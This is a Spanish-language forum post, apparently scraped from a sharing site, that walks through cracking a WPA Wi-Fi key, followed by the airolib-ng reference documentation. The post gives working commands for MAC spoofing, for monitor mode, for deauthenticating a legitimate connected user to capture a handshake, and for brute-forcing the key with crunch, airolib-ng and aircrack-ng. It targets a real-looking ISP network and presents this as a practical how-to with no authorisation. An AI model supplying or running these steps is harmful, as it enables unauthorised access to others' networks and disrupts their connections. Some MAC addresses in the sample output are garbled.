airolib + crunch

  • View
    150

  • Download
    6

Embed Size (px)

Text of airolib + crunch

Que weba, que weba, pero dado a que no estoy haciendo mi servicio social de la universidad pues le dedicare tiempo a hacer mi primer post..

Muchos saben sacar claves wep, osea, quien no? Esas viejas claves en Wired Equivalent Privacy, que ya hasta les sacaron uns distribucion DSL llamada beini para los webones, Hazme el reverendo favor. Otros tantos pocos han investigado y saben sacar o saben los principios basicos del como hacerse de una clave en WPA, no mather, la idea de este post es la de sacarlos de la caja donde viven y piensen afuera de esta y avancen utilizando mas la imaginacion.

Algunos saben usar airolib? ya saben las tablas tipo Rainbow tables para probar muchisimas mas claves por segundo de lo que te permite aircrack con un simple diccioonario, que si tienen un procesador dual core y 2 GB lo maximo que obtienen son 1200 K/seg. Bueno, sin tanto choro, vamos al grano....

REQUISITOS

librerias aircrack-ngbinarios de crunch password generatorun handshake de una clave WPAy chingos de paciencia

PASOS

airmon-ng stop wlan0 (detener tu targeta inalambrica, la interfaz puede cambiar "wlan0)

ifconfig wlan0 down (dar de baja la targeta para reconfigurarla)

macchanger --mac 00:11:22:33:44:55 (cambiar el Media Access Controll por uno mas facil y te agilise los sig. pasos)

iwconfig wlan0 mode monitor (cambiar el modo de la targeta a monitor)

airodump-ng wlan0 (monitorear las seales WI-FI a tu alcanze)_________________________________________________________________________________________EJEMPLO

CH 11 ][ Elapsed: 4 s ][ 2011-11-07 10:34

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

08:76F:60:3C:E8 -78 57 0 0 11 54e WPA PSK TELMEX

BSSID STATION PWR Rate Lost Packets Probes 08:76F:60:3C:E8 00:12:34:56:78:90____________________________________________________________________________________________

aireplay-ng -9 wlan0 *OPCIONAL* (hacer examen de inyeccion para ver si estas al alcanze y poras desautentificar al cliente)______________________________________________________________________________________

airodump-ng -c 11 -w dump --bssid 08:76F:60:3C:E8 wlan0 (estar a la escucha de la red por si cae un handshake)

## AHORA HAY QUE DESAUTENTIFICAR UN CLIENTE (USUARIO LEGITIMO Y CONECTADO DE LA RED) PARA OBTENER UN HANDSHAKE, O APRETON DE MANOS DONDE ESTA LA CLAVE QUE DESPUES SE SACA POR METODO DE FUERZA BRUTA.

aireplay-ng -0 10 -c 00:12:34:56:78:90 -b 08:76F:60:3C:E8 -e TELMEX wlan0

DESPUES DE ESO LES APARACERA UNA RESPUESTA COMO ESTA EN LA VENTANA DE MONITOREO

CH 11 ][ Elapsed: 4 s ][ 2011-11-07 10:34 [HANDSHAKE:00:12:34:56:78:90] essid.txt (escribir en el archivo de texto creado el nombre de la red)

cat essid.txt (leer el archivo de texto para confirmar que se escribio)

airolib-ng wpa --import essid essid.txt (crear la tabla con el nombre wpa e importar el nombre de la red del archivo de texto que creamos)

#ahora muevanse al directorio donde tienen crunch para correrlo

./crunch 10 10 0123456789 | airolib-ng /root/wpa --import passwd -

#este ultimo paso es para importar las contraseas que generara crunch las cuales seran en total 100 GIGAS, esto toma algo de tiempo, pero si toman atencion al numero que corre abajo se daran cuenta que crea una gran cantidad de contraseas probables y muchisimo mas rapido, tengan pasciencia y esperen.

airolib-ng /root/wpa --stats

airolib-ng /root/wpa --clean all

airolib-ng /root/wpa --batch

airolib-ng /root/wpa -verify all

## ME DIO WEBA EXPLICAR LOS DEMAS PASOS, SOLO HAGANLOS, NO LE HAGAN AL PANCHO, DESPUES DE ESO ESTARA LISTO LA TABLA CON EL NOMBRE DE wpa Y PUEDEN PROCEDER A ROMPER LA CLAVE.

aircrack-ng -r /root/wpa dump-01.cap -e TELMEX

MUCHA SUERTE, SI TE GUSTO DEJA TU COMENTARIO SI NO YA SABES QUE TAMBIEN, DALE A FAVORITOS, ROLALO EN TU MYSPACE, FACEBOOK, TWITTER, GOOGLE+

"hector leal"

jajajaja

si necesitan ayuda con cualquier cosa avisenme, estoy en tamaulipas y san luis potosi

STARK

s-t-a-r-k@live.com

Airolib-ngDescriptionAirolib-ng is an aircrack-ng suite tool designed to store and manage essid and password lists, compute their Pairwise Master Keys (PMKs) and use them in WPA/WPA2 cracking. The program uses the lightweight SQLite3 database as the storage mechanism which is available on most platforms. The SQLite3 database was selected taking in consideration platform availability plus management, memory and disk overhead. WPA/WPA2 cracking involves calculating the pairwise master key, from which the private transient key (PTK) is derived. Using the PTK, we can compute the frame message identity code (MIC) for a given packet and will potentially find the MIC to be identical to the packet's thus the PTK was correct therefore the PMK was correct as well. Calculating the PMK is very slow since it uses the pbkdf2 algorithm. Yet the PMK is always the same for a given ESSID and password combination. This allows us to pre-compute the PMK for given combinations and speed up cracking the wpa/wpa2 handshake. Tests have shown that using this technique in aircrack-ng can check more than 50 000 passwords per second using pre-computed PMK tables. Computing the PMK is still required, yet we can: Precompute it for later and/or shared use. Use distributed machines to generate the PMK and use their value elsewhere.To learn more about WPA/WPA2: See the WPA/WPA2 Information section on the wiki links page.To learn more about coWPAtty: Will Hack For SUSHI > CoWPAtty Wireless Defense CoWPAtty writeupAs stated above, this program requires the SQLite3 database environment. You must be running version 3.3.17 or above. You may obtain the latest version from the SQLite download page. UsageUsage: airolib [options] Where: database is name of the database file. Optionally specify the full path. operation specifies the action you would like taken on the database. See below for a complete list. options may be required depending on the operation specifiedHere are the valid operations: - -stats - Output some information about the database. - -sql {sql} - Execute the specified SQL statement. - -clean [all] - Perform steps to clean the database from old junk. The option 'all' will also reduce file size if possible and run an integrity check. - -batch - Start batch-processing all combinations of ESSIDs and passwords. This must be run prior to using the database within aircrack-ng or after you have added additional SSIDs or passwords. - -verify [all] - Verify a set of randomly chosen PMKs. If the option 'all' is given, all(!) PMKs in the database are verified and the incorrect ones are deleted. - -export cowpatty {essid} {file} - Export to a cowpatty file. - -import cowpatty {file} - Import a cowpatty file and create the database if it does not exist. - -import {essid|passwd} {file} - Import a text flat file as a list of either ESSIDs or passwords and create the database if it does not exist. This file must contain one essid or password per line. Lines should be terminated with line feeds. Meaning press enter at the end of each line when entering the values.Usage ExamplesHere are usage examples for each operation. Status OperationEnter: airolib-ng testdb --statsWhere: testdb is the name of the database to be created. - -stats is the operation to be performed.The system responds: statsThere are 2 ESSIDs and 232 passwords in the database. 464 out of 464 possible combinations have been computed (100%). ESSID Priority Done Harkonen 64 100.0 teddy 64 100.0SQL OperationThe following example will give the SSID VeryImportantESSID maximum priority. Enter: airolib-ng testdb --sql 'update essid set prio=(select min(prio)-1 from essid) where essid="VeryImportantESSID";'The system responds: update essid set prio=(select min(prio)-1 from essid) where essid="VeryImportantESSID"; Query done. 1 rows affected.The following example will look for very important patterns in the pmk. Enter: airolib-ng testdb --sql 'select hex(pmk) from pmk where hex(pmk) like "%DEADBEEF%"'The system responds: hex(pmk) BF3F122D3CE9ED6C6E7E1D7D13505E0A41EC4C5A3DEADBEEFFEFF597387AFCE3Clean OperationTo do a basic cleaning, enter: airolib-ng testdb --cleanThe system responds: cleanDeleting invalid ESSIDs and passwords... Deleting unreferenced PMKs... Analysing index structure... Done.To do a basic cleaning, reduce the file size if possible and run an integrity check., enter: airolib-ng testdb --clean allThe system responds: cleanDeleting invalid ESSIDs and passwords... Deleting unreferenced PMKs... Analysing index structure... Vacuum-cleaning the database. This could take a while... Checking database integrity... integrity_check ok Query done. 2 rows affected. Done.Batch OperationEnter: airolib-ng testdb --batchThe system responds: Computed 464 PMK in 10 seconds (46 PMK/s, 0 in buffer). No free ESSID found. Will try determining new ESSID in 5 minutes...Verify OperationTo verify a 1000 random PMKs, enter: airolib-ng testdb --verifyThe system responds: verifyChecking ~10.000 randomly chosen PMKs... ESSID CHECKED STATUS Harkonen 233 OK teddy 233 OKTo verify all PMKs, enter: airolib-ng testdb --verify allThe system responds: verifyChecking all PMKs. This could take a while... ESSID PASSWORD PMK_DB CORRECTCowpatty table Export OperationEnter: airolib-ng testdb --export cowpatty test cowexportoftestThe system responds: exportExporting... Done.Import OperationSSIDTo import an ascii list of SSIDs and create the database if it does not exist, enter: airolib-ng testdb --import essid ssidlist.txtWhere: testdb is the name of the database to be updated and it will be created if it does not exist. - -import is the operation to be performed. essid indicates it is a l